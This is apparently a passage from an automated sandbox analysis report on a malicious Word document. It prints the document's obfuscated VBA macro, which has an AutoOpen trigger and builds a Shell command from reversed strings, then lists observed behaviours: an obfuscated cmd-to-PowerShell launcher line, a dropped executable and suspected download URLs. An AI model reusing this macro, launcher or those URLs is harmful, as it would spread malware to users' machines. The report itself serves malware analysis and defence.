MnPCbfCX))))zuzrkQdsw = IQbUQiOAj = asoOZYZpj = (7867689 / mQzQuLURRau + 8255917 
* vRhwwE * (310301 / sGbfK / 6181173 - Tan(SKbtDQVzbE / CBool(XtiRwjBjT / 1570581 / dsfnftKYkkfuz))))End FunctionSub vMYGVKwdlvt(zaJhGts) On Error Resume Next Dim TkjfsfpJNznzoI() ReDim WBEHh(2) zpMThjdFuwnV(0) = 5181492 LfsNpUo(1) = 3117462 HwarVmjBlKNV = Loo - 9032215 MKwMESwA = 5351248 * 2669506End SubSub zFGYQzFpKYzFO(vVAIwfRYGflYzr As String)On Error Resume NextvtrJqSMzh = BEXHsITOw = KNrQL = (6253044 / tIjzp + 1426210 * MvcvWKTz * (2997182 / tQoCDElDCwRz / 824473 - Tan(fcnYENjLzD / CBool(wjXrmhMwDWvrAp / 902819 / unIDMrwPuWutBD))))iSlHHYNLP = QEBAHkkni = PpYozjFhIzPmTw = (9905422 / cGsijkiXrzKq + 8330176 * JjLulOKilY * (385160 / FOAilEBTIiuzS / 6095894 - Tan(AwAYOq / CBool(ofaYKldzUU / 6322256 / fUXNNFpXVipLb))))GGKhlAnAa = ZVDMuQqKK = TcAndjmSY = (3541080 / JqPzEi + 3681961 * jUtpEuCK * (318983 / ZhLUPsz / 1057977 - Tan(jwwhOiSQ / CBool(nPplXuaFZm / 9342424 / bYlGzlwoaWzzK))))mRlmiHliX = WmWnKQuKS = IaFaNaP = (9416436 / bERRqakcp + 3562569 * fLOEBwkLajuPDl * (8115551 / jrXMOKPCSEV / 6070200 - Tan(ZoErWjz / CBool(BYOpEWp / 6342197 / OfAqElRGhUvL))))lwdFwBrpY = jFsXfTJWK = ZVdqpfWVDnlp = (2329021 / BPbkk + 1090968 * zrQiaHTY * (3422536 / jXjWpH / 1183717 - Tan(acjoCmqsqWPr / CBool(mEUbiNIPX / 536495 / liBSjfLIVwKdnJ))))Shell drhQzJajzSLu + vVAIwfRYGflYzr + uzYCZjD + kYMLKHWbc
vbHidebjSqjRhGF = nLvEAUlAN = YHDEFQtTU = (1116744 / BEIVrfbUKjqv + 3814421 * scjYsZJtwDUXcN * (4819884 / wNATlGniIoJjD / 8390350 - Tan(MkHNoMubjcI / CBool(EBTDOv / 3967117 / duAKlpzPDPd))))qGWInUAkd = DlUqdAihp = vkiJDRjzbzOf = (4630613 / zSzisjjO + 2135319 * isZKjkGQZSTsH * (9408906 / qEWYlOXN / 849595 - Tan(LBzoIChZriLrY / CBool(rswGFwGK / 496914 / CcMpZcHi))))VTVjHbQQm = TQSGzfGht = RHHjAwjm = (6291771 / szOXjVFuIlXpp + 2010762 * tkJCzGIjMqXN * (6903400 / kXokatTB / 8999082 - Tan(dZLYIscSz / CBool(GOakjjjTChJIVa / 4587910 / iFOQUsp))))jYXvjYUOE = QnNVzEArK = zNQVE = (7133455 / uJXDj + 5278472 * YqLMnzu * (6478412 / ErhMBPdE / 4500149 - Tan(UtcTDS / CBool(idLrBj / 2400011 / zGtoDKFRuLdXYz))))ifSfaHVwX = HtdRQWbCI = NEIkQTvOb = (6427417 / Zvljzf + 4715461 * IFiAjmuas * (7951343 / SIUCLuWvCMfstP / 3007130 - Tan(wriRqDjAPiE / CBool(wVtCZjOzF / 8730911 / odkWJdMkl))))UEwiKXDPb = UmcqwwjTc = MAQcESto = (1250535 / XWCzTFuZKsB + 5572428 * XkGwwjnqqAtYkD * (5309459 / QRjziEzjfWrCG / 1719648 - Tan(SjAtszVuHSr / CBool(WJZiBSitaRf / 3384450 / nXRbokjh))))QapjKjtvW = biqXbZFop = YPJADjaFaDST = (6589268 / zFjjwr + 6705318 * wDpBavLzMnwA * (2133713 / GZlAkiTs / 851838 - Tan(wjXVqV / CBool(wBjRGLCIitcrf / 3902545 / whwJwwHEVFz))))hErXpHqzA = wbBAOirFl = BZoOmqWjXrqzO = (2137383 / iwRGDV + 136714 * TjVjwvPGBTf * (909939 / sqEhTaTFJ / 268650 - Tan(qtkkazh / CBool(AsUiRKYl / 1415723 / piiGhlHMZkuh))))End SubSub JhIqEKffCl(EhYLmWu) On Error Resume Next Dim LUUXijMzdNZw() ReDim SQKwJUTac(2) msXCzM(0) = 9176141 CpFVHpKdG(1) = 8432034 CRdollR = Loo - 2615999 dCaOjNh = 5980922 * 1290948End Sub", File "NmhnWHTzJVmj.bas" (Streampath: "Macros/VBA/NmhnWHTzJVmj") has code: "Function VziGLuPjjz()On Error Resume NextWfHIujbNMNc = "rFqiaDipZdAETj dmcGCdQvrwoIHmOPvfYujKqSfVh"qTThwY = QiOzpJzpA = qJWNdudLHM = (3335414 / WFFuTQDdaLM + 5848253 * jGtGqXOJ * (6500279 / sNUhnZSnfHjI / 1789407 - Tan(vqjlXBizrvwnk / CBool(RoDXoS / 2477158 / wjQDHYjXhYz))))DBwcKhIOsSJ = zLzqcljIv = YkzoNWqDM = (3747543 
/ hOszVUuFQUOYq + 7214511 * RwalIJRLZzQOu * (440507 / TUEGRwHsHRmCi / 309345 - Tan(LJDTEs / CBool(bKjPDSwFFA / 708282 / BuTjTzJFTT))))MsJPddN = gjHBjhbyuf(WfHIujbNMNc, 25, 15)MTzFiUnVwSG = "GMwcIQA & nXIWkzZSYWkK zqsYwLtUMjsADtaqTch"WblCkU = tapNRRRSa = tADRtkCOTS = (3838939 / RfRUJ + 8634014 * haNpY * (2865134 / TmiOKn / 5467678 - Tan(mjBifPkVjws / CBool(IJwzIYOsAfKfC / 6904762 / PkFIjaht))))Jrwzw = hSbNozEiq = ZAKphGlYjjG = (4738870 / fvwUliqLP + 5167417 * OihLavw * (243371 / AdiGZDwX / 1543646 - Tan(znJwvRpcSzATJ / CBool(vbDZZwonFE / 4198258 / Nsuij))))nuujzXVPTqz = gjHBjhbyuf(MTzFiUnVwSG, 20, 19)kvtdJGZLj = "sRhnLFlidjrjHtmo^C% %cEp^S^mo^C% IIKSRfsEjc"DiIPcPAXDl = UPzoZlRUz = zspSEUDzo = (3840327 / iUdqXzrV + 5050974 * RiSJOodXvhJTOO * (1400822 / UwsHYcJJlv / 3788747 - Tan(BnawZbhKXIqjaZ / CBool(mGOFPjzdudSXp / 4707671 / XTUfWI))))dzpLulEEWkV = HKumjzCLG = hwkXCXp = (865081 / DKfUGEr + 7264981 * lXLuDjf * (9158819 / TimuRoRk / 4734670 - Tan(BGzdQR / CBool(wbpoioLo / 5123815 / AmvAsGEWWbI))))dpJGfAk = gjHBjhbyuf(kvtdJGZLj, 11, 25)bbWqbSbJJ = "SmlfzfXlXfqjj%cEp^S^zFwAPhlpPdQnizo"fcfkRjSV = zawDEUjjU = NClzizYahkr = (1331390 / VPjwUb + 4518355 * QiWBzDLG * (3947267 / GAQHTfpbEYb / 2671225 - Tan(dsScnVW / CBool(IwQzUPw / 6452319 / MTNClGsOvEJsXw))))MIcYmhHOZ = qCTtJfaXl = SwDzJzPruHMIAN = (8475946 / ZOsQMXlzZuBW + 7841790 * VohOj * (7465046 / sEvoS / 9611288 - Tan(miBFBXF / CBool(fUlvNFa / 2914038 / tCrlXaliFihJwc))))InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 7)XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftDVqFWoShnd"kWMEMBfq = JVVntWawi = AEJAHqtoVjJ = (4473432 / XqIaMjDi + 4941923 * ZUqjOAk * (1863841 / WbifBKvI / 1102920 - Tan(XzomDzz / CBool(vNMizbtkjRKi / 7875512 / apAppKGPRbwX))))GZpckzMhf = BMkhmjROo = GsiHlRiiwbWmYz = (7247502 / Hmijwlj + 4948824 * hzzfbMawi * (6731329 / LiYoln / 5635332 - Tan(BPnkvZbfj / CBool(zVMEhD / 3436798 / zWOvquQcBY))))kJQbk = gjHBjhbyuf(XPHfTP, 5, 5)PTJPLcdqonj = "sKWNn V/ kQUlqz"smwXnkAVLtk = CNlHIqKaQ = caBlSu = (6304415 / JaSYSQZczESqUB + 
4012308 * rNrELojILqsCQ * (269042 / kscPtsd / 9112090 - Tan(ijtGIZoaF / CBool(uFDcnVq / 1980548 / bYWLvth))))BJirSRMj = wsmbwOSWW = udAlCRwFHF = (6395548 / ptChQTwL + 4021763 * MabwoiNjmjGIbN * (1911824 / ZGaGooAiCs / 4782500 - Tan(zwZKKwQZ / CBool(FdSsbS / 166193 / hSpXou))))jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 21)uiZcrs = "kDkYzNHcdKUiHwpduGjwlLwoIiGhszUKziJOiFfMjq zYAimaj"bVtOMZUuzBi = rFLmlrEni = wuroZwoNq = (8241912 / uXrjznDV + 3631389 * hibMUJlj * (5816245 / lFBZIzPKEShEbA / 9398398 - Tan(TFoDARLDPLP / CBool(FnCiMrioWS / 4771533 / YtQzlcGbPmpjua))))oKwalV = wTuzJwjnE = QDrkSILA = (6204466 / fHALSnFoNSwVj + 7307960 * OtYIcNloAjhkW * (1777173 / aoADvr / 3639129 - Tan(fWrvZmSuUFr / CBool(PnrDd / 8830541 / AbkCifGr))))jwhPS = gjHBjhbyuf(uiZcrs, 6, 24)HNljdjwLo = "wwXFzzcMonZlqwjhYkaR c/ LEAMJ"kwYnIhjTMT = vnpIqIuVz = RccLVu = (7951360 / TdfaUZLnR + 5225322 * qoZRjzDo * (1401300 / AFAZomNbfc / 997439 - Tan(EvBXUSPzCrTEH / CBool(sLtNRFit / 3669722 / fBfmzLmwL))))RPFvacwunvi = zkiPLckYK = JmwSVuCiR = (2011388 / LLbdsTnczrEUsK + 6699508 * vhkhhYT * (1882610 / iiKsudUoMlYC / 7268340 - Tan(JzvKiERE / CBool(njHAhc / 3488817 / sSrJlckEOkff))))dnviYZlaFD = gjHBjhbyuf(HNljdjwLo, 6, 15)VziGLuPjjz = MsJPddN + jwhPS + kJQbk + nuujzXVPTqz + dpJGfAk + InXrLQbYI + jKofwjNlE + dnviYZlaFDYKLJNbklN = kFUdaWMnc = LuwfjuJXULFU = (3753669 / YjcUznGsjZHM + 4560419 * LFYRmwUlaib * (3038198 / DPaIQ / 7297380 - Tan(FqurqpjSNYY / CBool(WdMOmoiVS / 7553105 / wshiCc))))GRrapbVLh = awRBXBGEt = qBnUiQPRjv = (9767410 / GdqGHj + 9320901 * CrCFNlDQPHr * (7669279 / ILbTwJKaJoPi / 3406306 - Tan(oLRuZINYzwhHw / CBool(zCZDKVw / 3435031 / nLWmGtD))))mXvuPFwNS = fajMcmpMz = GOLXwsWvdj = (565143 / GfwLJLCzt + 755953 * lfuOFnA * (4170878 / ofmobA / 9796525 - Tan(tJUdP / CBool(UEQQcd / 2012897 / hCCZs))))End Function", File "bOZoJDmQi.bas" (Streampath: "Macros/VBA/bOZoJDmQi") has code: "Sub jwAPrmtHfWYiZU(GhRoHsczow) On Error Resume Next Dim JZYbU() ReDim fmArWrcK(2) NGJpzoFL(0) = 575443 VcaHEzMQr(1) = 
5463778 jDCIwmUm = Loo - 7010483 odsiWozBLENVF = 9803903 * 7737006End SubFunction gjHBjhbyuf(ByVal ZzbnrCODBCS As String, wwTmqTMcXJzc, JWfzwYdiwmSu)On Error Resume NextFfwrJbliv = iCGjwClYS = jziciLNPfXG = (2618076 / DTtGXuaOCuwzTh + 3505836 * JToCZ * (3520940 / XDOjwMFKoREC / 2515579 - Tan(vNirRd / CBool(ldOdu / 2517980 / ERKYliWDI))))OiCwkHhOi = FwNFKLIok = ZzCBzjFWGfRi = (6771038 / EPNPjUdvzzpQJ + 9841920 * zQwukd * (1719629 / cDNikbi / 2542376 - Tan(NWAuzsHQI / CBool(ADMiaGPGPU / 7658354 / NvDlMSqsUQmSCm))))wMCXpiczI = IQUnXUUTs = OIErLjoaPKj = (3288017 / fnIDErfJWNnuV + 8366725 * SXzztjnitU * (8251802 / AENpZrWoAPQQb / 2596605 - Tan(suRwqpJHr / CBool(lXJsIOj / 2593180 / iFIYN)))) RaRmBVj = wCiDG + StrReverse(ZzbnrCODBCS) + WfKvjcYABrwiaHLwiiiJlMf = foUMwsBhC + RaRmBVj + jUjWEtrmfEkbPrzwYlK = MznIntYjl = lCYjvw = (8093711 / NXfJPLs + 7163975 * ZcNzT * (2949956 / qavLwdfKF / 6129768 - Tan(BLuTvJlLNiCkb / CBool(BpzGYHSm / 259930 / VAiOksVEjSqZJ))))FjDNIBsnp = UvuojDjYb = KDwuiWa = (4187368 / wBIZcf + 8797874 * UtJlIDffj * (3884010 / LSYKrbPFHmYrhf / 6748408 - Tan(oMVSImdLfRdB / CBool(SOvCi / 1926873 / arRwMamnwBbFZ))))OrTOBnZoM = iZzNFpYdo = VrOzu = (4524736 / iApPdq + 4639370 * lbujArkCNM * (8440716 / zVzPS / 2555428 - Tan(khzuYqwFY / CBool(zAiZlTNdznLkoB / 6987210 / XGNDa)))) ppiHKsb = QSotmjWqEmMDQM + Mid(iaHLwiiiJlMf, wwTmqTMcXJzc, JWfzwYdiwmSu) + aNBjmUZMztwJVTp = sVYzkQlrj = HGjZYlkYuwt = (2190687 / ocrFoAnW + 98932 * OtqfQbspV * (4050253 / fOpma / 1506507 - Tan(lbXwjAk / CBool(sLwqsKGkV / 6108094 / GTwBHXqSJOB))))SOtalZzRN = qutjjsicr = dUHsBtpZQ = (4721764 / ibIrsizSYhkDS + 8366929 * aNVOtOa * (7009979 / jLVrjvzjtXHT / 7044525 - Tan(oKjJSrtRoBpTb / CBool(BicHr / 4711404 / hMGmdiA))))gjHBjhbyuf = ppiHKsbJvjspVhDN = EHtrOWTBM = vhOuzcMj = (1342472 / aXpIsHtRziFXwR + 4536538 * zhvKt * (928905 / ImSvAkQdpa / 1147832 - Tan(hRkwHdCEiOXj / CBool(XziikwEVwjVZMs / 6416776 / AQzsiqiNjoj))))End FunctionSub AruPjwdkmwEdB(kkOYukUX) On Error Resume Next Dim 
zarRhRRvvQN() ReDim FmGqOPwu(2) MUqNF(0) = 9496252 KuvVdJzorjwTUD(1) = 1643269 nwfwHij = Loo - 4113443 cflGAEbTS = 7173812 * 261001End SubSub AutoOpen()On Error Resume NextUsrvoRwhT = cZwDGDQaw = bOazAdMiqcUAC = (3456340 / tvFjKp + 6874729 * BvDhhzznBVbJnt * (8979321 / RcjHEzcXjwNIL / 8149706 - Tan(AsPYBwwiitoS / CBool(aIUzANShGc / 8930458 / SfAkl))))ocLjbRXVs = uVzANPjzz = cOHzYGuQU = (4162058 / RvuzELHwzrw + 5799807 * TzkGOi * (4278790 / hcIXhfnaj / 260271 - Tan(zKcZD / CBool(JDZzw / 6336480 / kAiaWnCqzNk))))SlZXjUXSp = tizqXhDEa = VivcnhAMEszMAw = (8603081 / RdlXFb + 6241100 * mFCoDokzPCrBW * (1767545 / qjHTZqhiBzQP / 4837778 - Tan(DruCEqii / CBool(IPICwzE / 8356324 / IsvqzIHAFbBq))))mZLdMKzwR = SDLUwERok = wGjHjYMulvD = (7169414 / dVWpwY + 6952277 * HsSppjWwEqMU * (8970612 / kGSiF / 9887288 - Tan(LDNhwizc / CBool(UPAtpNN / 3408423 / oqwhFrQMYkPXR))))SkXvoEHtB = XVqVwTBPX = AnQITiwWQjJON = (8185810 / wPVtY + 1639503 * wnTbrj * (8911087 / KINVXiCcEQqirJ / 8332024 - Tan(HzSAEj / CBool(wkqocornO / 5438362 / YBBrTYun))))QdhaSpwLT = rQutimOkj = ZnMdbFXkqGPj = (8988894 / QPsQKX + 9958922 * dYvziauOnGm * (6683091 / ADAGUvEG / 874159 - Tan(LVocP / CBool(zaIpuJohdXzqb / 3728533 / tLlQLs))))Application.Run "zFGYQzFpKYzFO"
SHzYRwHKqcvZYUkb = tziUqjita = OScwzOiluSJCM = (732925 / mkfuU + 7095966 * zCdzLGdc * (2809881 / LZwZitij / 8977252 - Tan(ZRRrlaUDwwwF / CBool(uVaSwC / 4659414 / RDrrmH))))bDqANZzuf = kmOlmZjPU = UCEIaj = (5860312 / fHNazwTsA + 1119273 * kfIzqqfkRliloW * (7251450 / EXuPUjDR / 7456153 - Tan(JmPRtYaR / CBool(ZLDNSuvNkzW / 4947329 / OfPVF))))qdBcrMYjt = UzsJLWmMH = JbUYW = (3575939 / QrEYkCXT + 6983264 * izUqolBbNsnK * (579861 / CXNMiVFf / 1905809 - Tan(whbUkzUqa / CBool(EOnLUpTzIZj / 1077194 / nWMoLpPhCnzt))))HKhqPYzjT = MnkCroCIW = qqsozXJJBLB = (381542 / pRNflGtBjV + 4034076 * jblTAMZjDG * (645148 / VjTFPvY / 3541043 - Tan(LuliIQB / CBool(iHUXNOvYpA / 9802786 / VYjNwJCnnl))))nzCQXjAos = wYCUwirIU = hZvZqonLX = (6297233 / OOpwUXUwrOXBIC + 672742 * DlfGBhPF * (2390232 / YLcjVcHtiJMXd / 2127173 - Tan(McIJYmWnV / CBool(asazjzkkcwJ / 3901106 / tvtPUu))))GjHUjoEGv = oFCYGzvkh = BKcnBMNsVPOiXC = (8702968 / DSXqIbs + 7765599 * WwkNHwKMTSjdtF * (1556379 / wjrhKizfr / 9349546 - Tan(MrnaRoriPc / CBool(NRDREjJlKM / 2985742 / LsBHlowF))))WLVzVfsSp = CbstSWads = PVGmPzXbhP = (6349087 / pSWIB + 9061378 * wYrqvI * (7178093 / ZtVbdtLhj / 3059376 - Tan(GAzDKCIwm / CBool(XKUfWvEYf / 2040423 / iaziMoDLil))))mscoGwVhn = mLzzCiAwH = GJEFucZAUzOFlI = (7767947 / RsqQwjqrXSi + 5595608 * AMswMXciniLjw * (87401 / ZhZrISQIFqC / 4405261 - Tan(NhbzwFUl / CBool(JYkMCiKik / 9587127 / HRqtnUcjDmF))))KAKUFGOjs = fzEYAGwQl = bFEnKwriJcdlhi = (697886 / jChZDQA + 964031 * JMSsh * (4508036 / zFLzGMz / 4700877 - Tan(XEHPuPV / CBool(mWujMuKF / 9868175 / BjZqcFRobWD))))End SubSub WCILjL(pJtqzFKcclLBu) On Error Resume Next Dim czoohc() ReDim zGowQ(2) zraAOzLJbH(0) = 8565218 kRcoCQVIBu(1) = 956827 XwjrrDFr = Loo - 6348268 KlCkzBjzBq = 9309066 * 2445692End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DFCFE796D0F05200A2.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-55183"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-55183"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Local\x64_10MU_ACB10_S-1-5-5-0-55183"
"Local\x64_10MU_ACBPIDS_S-1-5-5-0-55183" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at F1410000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E1720000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.E08="4""
Process "cmd.exe" was launched with modified environment variables: "PROCESSOR_ARCHITECTURE, CommonProgramFiles, ProgramFiles"
Process "cmd.exe" was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"
Process "powershell.exe" was launched with new environment variables: "%PnudkPBnvRAjVPb%="DdvUuuz", %var5%="he", %var1%="p", %var7%="p", %var8%="ow", %var2%="ow", %ArQWcsLIfSRKwwT%="DWcTblEVs", %sdJUjBQbairSAth%="hrFapszPTzlTFB", %var3%="er", %btHkJMzDjjiWVZK%="WYrzozjmBIwYc", %var6%="ll", %var4%="s""
Process "195082.exe" was launched with modified environment variables: "PSModulePath"
Process "195082.exe" was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "195082.exe" was launched with modified environment variables: "PROCESSOR_ARCHITECTURE, CommonProgramFiles, ProgramFiles" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[...]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))" on 2018-2-28.11:17:29.463
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[...]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))"
Spawned process "powershell.exe" with commandline "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('[...]' |ConVerTTO-secuREStrING -KEy (146..169)) ))))"
Spawned process "195082.exe"
Spawned process "195082.exe" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"195082.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$9168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc" has type "data"
"129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Jan 31 09:15:39 2018 mtime=Wed Jan 31 09:15:39 2018 atime=Wed Jan 31 09:16:04 2018 length=226304 window=hide"
"~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp" has type "data"
"index.dat" has type "data"
"8TCMB5ZGMHB3S9U7XP4L.temp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "powershell.exe" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6F053C44-FAC4-4CB6-B75C-D30842EE3494}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{66758469-FC90-43A0-9F39-0EC9C13436FC}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{031F2E9C-5864-470B-B484-C4455FED1851}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{031F2E9C-5864-470B-B484-C4455FED1851}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\stdole2.tlb"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\sendtoonenote.BUD"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\sendtoonenote.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\stdnames.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNoteNames.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNoteFilter.gpd"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\x64\3\SendToOneNote.ini" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://dmd.metaservices.microsoft.com/dms/metadata.svc"
Pattern match: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
Heuristic match: "GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cc1043c359113e4e HTTP/1.1Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 20 Apr 2017 16:02:20 GMTIf-None-Match: 04e707defb9d21:0User-Agent: Microsoft-CryptoAPI/6.1Hos"
Heuristic match: "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?a2e92fdaed906d8e HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ctldl.windowsupdate.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: s2.symcb.com"
Pattern match: "http://www.symauth.com/cps0"
Pattern match: "http://www.symauth.com/rpa0"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBuN56dlW1Lzehhu%2FtdSD3U%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: sv.symcd.com"
Pattern match: "http://www.symauth.com/cps0*"
Heuristic match: "GET /CRL/Omniroot2025.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: cdp1.public-trust.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAt%2BEJA8OEkP%2Bi9nmoehp7k%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ocsp.digicert.com"
Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSLIycRsoI3J6zPns4K1aQgAqaqHgQUZ50PIAkMzIo65YJGcmL88cyQ5UACEAG2Yem3HYLmNssdMr3TCFk%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: ocsp.digicert.com"
Pattern match: "www.utilitybillingsoftwares.com"
Pattern match: "http://amor.official.pw/f3sqVF/"
Pattern match: "http://amor.official.pw/f3sqVF//"
Pattern match: "passlist.txt/passlist.txt"
Pattern match: "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Pattern match: "www.erzotech.eu"
